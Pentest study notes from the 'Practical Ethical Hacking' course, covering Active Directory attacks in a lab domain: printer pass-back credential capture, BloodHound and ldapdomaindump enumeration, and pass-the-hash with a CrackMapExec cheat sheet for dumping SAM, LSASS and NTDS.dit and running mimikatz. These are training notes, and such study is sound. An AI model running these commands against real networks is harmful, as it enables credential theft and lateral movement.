- (Inbound) Core Networking - Dynamic Host Configuration Protocol for IPv6 (DHCPV6-In)
- (Inbound) Core Networking - Router Advertisement (ICMPv6-In)
- (Outbound) Core Networking - Dynamic Host Configuration Protocol for IPv6 (DHCPV6-Out)

If WPAD is not in use internally, disable it via Group Policy and by disabling the WinHttpAutoProxySvc service.

Relaying to LDAP and LDAPS can only be mitigated by enabling both LDAP signing and LDAP channel binding.

Consider adding administrative users to the Protected Users group or marking them as "Account is sensitive and cannot be delegated", which will prevent any impersonation of that user via delegation.

--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/14. Attacking Active Directory (Initial Attack Vectors)/12. Passback Attacks.md:
--------------------------------------------------------------------------------

# Passback Attacks
> 03.08.2024
---

https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack

## Summary

**What is an MFP and MFP Hacking anyway?**

Multi-Function Peripherals (MFPs) are often overlooked in penetration testing, but they can provide a wealth of information and access to a network.

- Credential Disclosure
- File System Access
- Memory Access

MFPs (Multi-Function Peripherals) are devices typically found in corporate closets, equipped with:

- Network ports
- USB drives
- Control panels with specialized applications

They offer more than just basic copy, print, and fax functions, including:

- Integration with corporate networks for scan/email capabilities
- Functionality that requires:
  - LDAP (Lightweight Directory Access Protocol) integration
  - SMTP (Simple Mail Transfer Protocol) integration
  - Network Shares

**Did You Say LDAP?**

MFPs use Lightweight Directory Access Protocol (LDAP) integration, which can be used to control access to printing, copying, and scanning. By modifying the LDAP server field in the Embedded Web Service (EWS), an attacker can capture credentials and gain access to the network.

**Why MFP Hacking Matters**

A successful MFP breach can result in credential disclosure, file system access, and memory access. MFPs are a prime target for penetration testing due to their physical accessibility, poor management, and default credentials.

**Introducing the Pass-Back Attack**

The Pass-Back Attack involves replacing the legitimate LDAP server with a malicious one, allowing the attacker to capture credentials and gain access to the network.

**Accessing the EWS**

Most MFPs ship with default administrative credentials to access the EWS. These credentials can be used to gain initial access to the MFP.

- https://github.com/RUB-NDS/PRET
- https://github.com/percx/Praeda
- https://www.hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet

**Replace LDAP Attributes**

Once authenticated to the EWS, an attacker can modify the LDAP settings to point to a malicious LDAP server.

![[Passback Attacks 01.webp]]

**Capture Credentials**

Set up a listener with netcat or Responder. The next time a user inputs their credentials at the control panel, the MFP will send their information to the LDAP server under the attacker's control.

![[Passback Attacks 02.webp]]

**Attacking SMTP and Windows Sign-in**

This attack can also be conducted against other settings on the MFP that support authentication, such as SMTP and Windows sign-in.

![[Passback Attacks 03.webp]]

Conducting attacks on the SMTP configuration can also produce fruitful results. The existing SMTP configuration for this MFP has stored credentials for SMTP authentication that can be passed back to us after replacing the existing SMTP server with our own SMTP server.

![[Passback Attacks 04.webp]]

**Big Payout with Low Risk**

MFPs are a prime target for penetration testing due to their high payout potential and low risk.

**Get Started with MFP Hacking and Pen Testing**

To get started with MFP hacking and pen testing, you can use tools like the Printer Exploitation Toolkit (PRET) and Praeda, and learn more about pen testing services and cybersecurity consulting.
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/14. Attacking Active Directory (Initial Attack Vectors)/13. Initial Internal Attack Strategy.md:
--------------------------------------------------------------------------------
# Initial Internal Attack Strategy
> 03.08.2024
---

## 1. Start the day with mitm6 or Responder

## 2. Run scans to generate traffic

## 3. If scans are taking too long, look for websites in scope (http_version)

## 4. Look for default credentials on web logins

## 5. Think outside the box
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/15. Attacking Active Directory (Post-Compromise Enumeration)/00. image/domain enumeration with ldapdomaindump 01.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/Practical Ethical Hacking - The Complete Course/15. Attacking Active Directory (Post-Compromise Enumeration)/00. image/domain enumeration with ldapdomaindump 01.png
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/15. Attacking Active Directory (Post-Compromise Enumeration)/00. image/domain enumeration with plumhound 01.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/Practical Ethical Hacking - The Complete Course/15. Attacking Active Directory (Post-Compromise Enumeration)/00. image/domain enumeration with plumhound 01.png
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/15. Attacking Active Directory (Post-Compromise Enumeration)/01. Domain Enumeration with ldapdomaindump.md:
--------------------------------------------------------------------------------
# Domain Enumeration with ldapdomaindump
> 05.08.2024
---
### IP Addresses
MARVEL-DC: `192.168.19.128`
THEPUNISHER: `192.168.19.129`
SPIDERMAN: `192.168.19.130`
HackerMan: `192.168.19.131`

**LdapDomainDump:**
```bash
mkdir marvel.local && cd marvel.local

sudo ldapdomaindump ldaps://192.168.19.128 -u 'MARVEL\fcastle' -p Password1

[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

ls

domain_computers.grep        domain_policy.json
domain_computers.html        domain_trusts.grep
domain_computers.json        domain_trusts.html
domain_computers_by_os.html  domain_trusts.json
domain_groups.grep           domain_users.grep
domain_groups.html           domain_users.html
domain_groups.json           domain_users.json
domain_policy.grep           domain_users_by_group.html
domain_policy.html
```

**View the dump:**
```bash
firefox domain_users_by_group.html
```

![[domain enumeration with ldapdomaindump 01.png]]

- Get high value credentials
- Get domain users
- Utilize available info

--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/15. Attacking Active Directory (Post-Compromise Enumeration)/02. Domain Enumeration with Bloodhound.md:
--------------------------------------------------------------------------------
# Domain Enumeration with Bloodhound
> 05.08.2024
---
### IP Addresses
MARVEL-DC: `192.168.19.128`
THEPUNISHER: `192.168.19.129`
SPIDERMAN: `192.168.19.130`
HackerMan: `192.168.19.131`


**Start neo4j:**
```bash
sudo neo4j console

Directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
logs: /etc/neo4j/logs
plugins: /usr/share/neo4j/plugins
import: /usr/share/neo4j/import
data: /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses: /usr/share/neo4j/licenses
run: /var/lib/neo4j/run
Starting Neo4j.
2024-08-05 10:07:05.128+0000 INFO Starting...
2024-08-05 10:07:05.332+0000 INFO This instance is ServerId{25167f39} (25167f39-46b5-409f-91a1-64b55b3b7d33)
2024-08-05 10:07:05.839+0000 INFO ======== Neo4j 4.4.26 ========
2024-08-05 10:07:06.634+0000 INFO Initializing system graph model for component 'security-users' with version -1 and status UNINITIALIZED
2024-08-05 10:07:06.638+0000 INFO Setting up initial user from defaults: neo4j
2024-08-05 10:07:06.638+0000 INFO Creating new user 'neo4j' (passwordChangeRequired=true, suspended=false)
2024-08-05 10:07:06.642+0000 INFO Setting version for 'security-users' to 3
2024-08-05 10:07:06.643+0000 INFO After initialization of system graph model component 'security-users' have version 3 and status CURRENT
2024-08-05 10:07:06.645+0000 INFO Performing postInitialization step for component 'security-users' with version 3 and status CURRENT
2024-08-05 10:07:06.795+0000 INFO Bolt enabled on localhost:7687.
2024-08-05 10:07:07.189+0000 INFO Remote interface available at http://localhost:7474/
2024-08-05 10:07:07.191+0000 INFO id: 822FDC62194D2DE143CF2F436E9D0D9538BE1C20BADF9AD6165C2FC72281E920
2024-08-05 10:07:07.191+0000 INFO name: system
2024-08-05 10:07:07.191+0000 INFO creationDate: 2024-08-05T10:07:06.127Z
2024-08-05 10:07:07.191+0000 INFO Started.

```

- Required for bloodhound
- http://localhost:7474/
- new user 'neo4j'
  - Set password if first time login
  - Default password: neo4j / neo4j

**Start Bloodhound:**
```bash
sudo bloodhound
```
- Enter password for neo4j in bloodhound
- Collect data into bloodhound / ingestors

**Run ingestor:**
```bash
mkdir bloodhound && cd bloodhound

sudo bloodhound-python -d MARVEL.local -u fcastle -p Password1 -ns 192.168.19.128 -c all
INFO: Found AD domain: marvel.local
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (hydra-dc.marvel.local:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: hydra-dc.marvel.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 3 computers
INFO: Connecting to LDAP server: hydra-dc.marvel.local
INFO: Found 8 users
INFO: Found 52 groups
INFO: Found 3 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: SPIDERMAN.MARVEL.LOCAL
INFO: Querying computer: THEPUNIISHER.MARVEL.LOCAL
INFO: Querying computer: HYDRA-DC.MARVEL.LOCAL
INFO: Done in 00M 00S

ls
20240805051303_computers.json   20240805051303_gpos.json    20240805051303_users.json
20240805051303_containers.json  20240805051303_groups.json
20240805051303_domains.json     20240805051303_ous.json
```

**Import data into bloodhound:**
1. Select upload data
2. Select the location used to store the data
3. Select all and open

--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/15. Attacking Active Directory (Post-Compromise Enumeration)/03. Domain Enumeration with Plumhound.md:
--------------------------------------------------------------------------------
# Domain Enumeration with Plumhound
> 05.08.2024
---

### IP Addresses
MARVEL-DC: `192.168.19.128`
THEPUNISHER: `192.168.19.129`
SPIDERMAN: `192.168.19.130`
HackerMan: `192.168.19.131`

**Installing Plumhound:**
```bash
git clone https://github.com/PlumHound/PlumHound.git
cd PlumHound
pip3 install -r requirements.txt
```

**Utilize Plumhound:**
```bash
sudo python3 PlumHound.py --easy -p password
...
Completed 1 of 1 tasks.
```
- Bloodhound and neo4j must be open!

**Execute task:**
```bash
sudo python3 PlumHound.py -x tasks/default.tasks -p password
...
Completed 114 of 114 tasks.

cd reports

firefox index.html
```

![[domain enumeration with plumhound 01.png]]
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/16. Attacking Active Directory (Post-Compromise Attacks)/00. image/kerberosting overview 01.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/Practical Ethical Hacking - The Complete Course/16. Attacking Active Directory (Post-Compromise Attacks)/00. image/kerberosting overview 01.png
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/16. Attacking Active Directory (Post-Compromise Attacks)/01. Pass Attacks Overview.md:
--------------------------------------------------------------------------------
# Pass Attacks Overview
> 29.07.2024
---

## Explanation

**Pass attacks** are a type of cybersecurity threat where attackers use captured credentials, such as passwords or hashes, to move laterally within a network and gain unauthorized access to systems. The primary goal is to find a valid login on one of the machines within the network, allowing the attacker to escalate privileges and potentially compromise the entire system.

**Pass the Hash** is a hacking technique where an attacker captures a hashed version of a password and uses it to authenticate themselves without needing to know the actual password.

**Pass the Password** is a simpler concept compared to Pass the Hash. In this attack, the actual plaintext password is captured and used directly by the attacker.

## Workflow

#### 1. Initial Access
- **Objective:** Gain a foothold in the network.
- **Methods:**
  - **Phishing:** Sending emails with malicious attachments or links to employees to trick them into revealing credentials or installing malware.
  - **Exploiting Vulnerabilities:** Taking advantage of known vulnerabilities in software or systems to gain access.
  - **Social Engineering:** Manipulating individuals to disclose sensitive information or credentials.

#### 2. Credential Harvesting
- **Objective:** Capture user credentials, either in plaintext or hashed form.
- **Methods:**
  - **Keylogging:** Using malware to record keystrokes and capture usernames and passwords.
  - **Memory Dumping:** Extracting password hashes directly from the computer's memory.
  - **Network Sniffing:** Monitoring unencrypted network traffic to capture credentials being transmitted.

#### 3. Credential Analysis
- **Objective:** Identify useful credentials for lateral movement.
- **Methods:**
  - **Analyzing Hashes:** Reviewing captured password hashes to determine their potential usability.
  - **Cracking Passwords:** Attempting to decrypt hashed passwords using tools like John the Ripper or Hashcat, especially for weak or common passwords.

#### 4. Lateral Movement
- **Objective:** Move through the network using stolen credentials.
- **Methods:**
  - **Pass the Hash (PtH):** Using hashed credentials to authenticate with other machines on the network without needing the plaintext password.
  - **Pass the Password:** Using plaintext passwords to log into other machines directly.
  - **Remote Access Tools:** Utilizing tools like RDP (Remote Desktop Protocol) or PsExec to execute commands on remote machines.


## How to [Crackmapexec](https://github.com/byt3bl33d3r/CrackMapExec)

**Pass the Password:**
```bash
crackmapexec smb <target> -u <user> -d <domain> -p <password>

crackmapexec smb 10.0.2.0/24 -u fcastle -d MARVEL.local -p Password123
```

**Pass the Hash:**
```bash
crackmapexec smb <target> -u <user> -H <ntlm-hash> --local-auth

crackmapexec smb 10.0.2.0/24 -u administrator -H $hash --local-auth
```

**Dump SAM hashes:**
```bash
crackmapexec smb <target> -u <user> -H <ntlm-hash> --local-auth --sam

crackmapexec smb 10.0.2.0/24 -u administrator -H $hash --local-auth --sam
```

**Dump shares:**
```bash
crackmapexec smb <target> -u <user> -H <ntlm-hash> --local-auth --shares

crackmapexec smb 10.0.2.0/24 -u administrator -H $hash --local-auth --shares
```

**Dump lsass with lsassy:**
```bash
crackmapexec smb <target> -u <user> -H <ntlm-hash> --local-auth -M lsassy

crackmapexec smb 10.0.2.0/24 -u administrator -H $hash --local-auth -M lsassy
```

**Show built-in modules:**
```bash
crackmapexec smb -L
```

**The CME DB:**
```bash
cmedb
```

**Cheatsheet from CME:**
https://ptestmethod.readthedocs.io/en/latest/cme.html

## Grab local hashes

**Get hashes via [secretsdump](https://github.com/fin3ss3g0d/secretsdump.py):**
```bash
secretsdump.py <domain>/<user>:<password>@<target>

secretsdump.py MARVEL.local/fcastle:Password123@10.0.2.25
```

**Get hashes via metasploit:**

```bash
msfconsole -q
use windows/smb/psexec
```

--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/16. Attacking Active Directory (Post-Compromise Attacks)/01.5. Crackmapexec large Cheatsheet.md:
--------------------------------------------------------------------------------

# Crackmapexec large cheatsheet
> 29.07.2024

---

# CrackMapExec (CME) Cheatsheet

### Common Syntax

- **Basic Structure:**
```bash
cme <protocol> <target> -u <user> -p <password> [options]
```

- **Using Hashes:**
```bash
cme <protocol> <target> -u <user> -H <hash> [options]
```

- **Using NTLM Hashes:**
```bash
cme <protocol> <target> -u <user> -H <ntlm-hash>
```

### SMB (Server Message Block)

- **List SMB Shares:**
```bash
cme smb <target> --shares
```

- **Enumerate Users:**
```bash
cme smb <target> --users
```

- **Enumerate Groups:**
```bash
cme smb <target> --groups
```

- **Enumerate Sessions:**
```bash
cme smb <target> --sessions
```

- **Enumerate Domain:**
```bash
cme smb <target> --enum
```

- **Execute Remote Command:**
```bash
cme smb <target> -u <user> -p <password> -x <command>
```

- **SMB Login Check:**
```bash
cme smb <target> -u <user> -p <password>
```

- **Pass the Hash (PTH):**
```bash
cme smb <target> -u <user> -H <ntlm-hash>
```

- **Pass the Password (PTP):**
```bash
cme smb <target> -u <user> -p <password> --local-auth
```

- **SAM Dump:**
```bash
cme smb <target> -u <user> -p <password> --sam
```

- **LSASS Dump:**
```bash
cme smb <target> -u <user> -p <password> --lsa
```

- **Dump NTDS.dit (Domain Controller):**
```bash
cme smb <target> -u <user> -p <password> --ntds
```

- **WMI Command Execution:**
```bash
cme smb <target> -u <user> -p <password> -x <command> --exec-method wmi
```

- **Mimikatz:**
```bash
cme smb <target> -u <user> -p <password> -M mimikatz
```

- **PowerShell Scripts:**
```bash
cme smb <target> -u <user> -p <password> -M powershell -o "COMMAND=